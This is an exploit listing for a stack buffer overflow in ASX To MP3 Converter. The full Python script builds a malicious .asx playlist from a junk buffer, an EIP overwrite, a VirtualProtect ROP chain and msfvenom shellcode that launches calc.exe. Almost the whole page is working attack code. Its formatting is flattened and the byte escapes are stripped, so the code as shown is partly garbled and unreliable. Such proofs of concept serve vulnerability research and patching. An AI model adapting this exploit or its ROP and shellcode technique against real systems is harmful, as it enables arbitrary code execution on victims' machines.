Home / exploits ASX To MP3 Converter Stack Overflow
Posted on 11 October 2017
import struct,sys head ='''<ASX version="3.0"> <Entry> <REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_''' #offset 17375 junk = "A" *17375 #0x1003df8e #0x774e1035 EIP="x36x10x4ex77" adjust="A" *4 def create_rop_chain(): rop_gadgets = [ 0x73dd5dce, # POP EAX # RETN [MFC42.DLL] 0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll] 0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll] 0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL] 0x7c96feb7, # POP EBP # RETN [ntdll.dll] 0x7608fcec, # & push esp # ret [MSVCP60.dll] 0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x77d74960, # NEG EAX # RETN [USER32.dll] 0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll] 0x01d64827, # POP EAX # RETN [msvos.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x77d74960, # NEG EAX # RETN [USER32.dll] 0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll] 0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll] 0x77da1d04, # &Writable location [USER32.dll] 0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll] 0x76091182, # RETN (ROP NOP) [MSVCP60.dll] 0x7d7da123, # POP EAX # RETN [WMVCore.DLL] 0x90909090, # nop 0x77195015, # PUSHAD # RETN [OLEAUT32.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "x00x0ax0d EXITFUNC=seh #badcharacters "x00x0ax0d" buf = "" buf += "xdaxd6xbaxf5xa4x32xf4xd9x74x24xf4x5dx31" buf += "xc9xb1x31x83xc5x04x31x55x14x03x55xe1x46" buf += "xc7x08xe1x05x28xf1xf1x69xa0x14xc0xa9xd6" buf += "x5dx72x1ax9cx30x7exd1xf0xa0xf5x97xdcxc7" buf += "xbex12x3bxe9x3fx0ex7fx68xc3x4dxacx4axfa" buf += "x9dxa1x8bx3bxc3x48xd9x94x8fxffxcex91xda" buf += "xc3x65xe9xcbx43x99xb9xeax62x0cxb2xb4xa4" buf += "xaex17xcdxecxa8x74xe8xa7x43x4ex86x39x82" buf += "x9fx67x95xebx10x9axe7x2cx96x45x92x44xe5" buf += "xf8xa5x92x94x26x23x01x3exacx93xedxbfx61" buf += "x45x65xb3xcex01x21xd7xd1xc6x59xe3x5axe9" buf += "x8dx62x18xcex09x2fxfax6fx0bx95xadx90x4b" buf += "x76x11x35x07x9ax46x44x4axf0x99xdaxf0xb6" buf += "x9axe4xfaxe6xf2xd5x71x69x84xe9x53xcex74" buf += "x1bx6exdaxe1x82x1bxa7x6fx35xf6xebx89xb6" buf += "xf3x93x6dxa6x71x96x2ax60x69xeax23x05x8d" buf += "x59x43x0cxeex3cxd7xccxdfxdbx5fx76x20" shellcode="S"*10+buf print "Length of shellcode is:",len(shellcode) print "Length of ropchain is:",len(rop_chain) print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain)) garbage= "C" *8303 foot ='''_playlis.wma"/> </Entry> </ASX>''' payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot fobj = open("exploit.asx","w") fobj.write(payload) fobj.close()
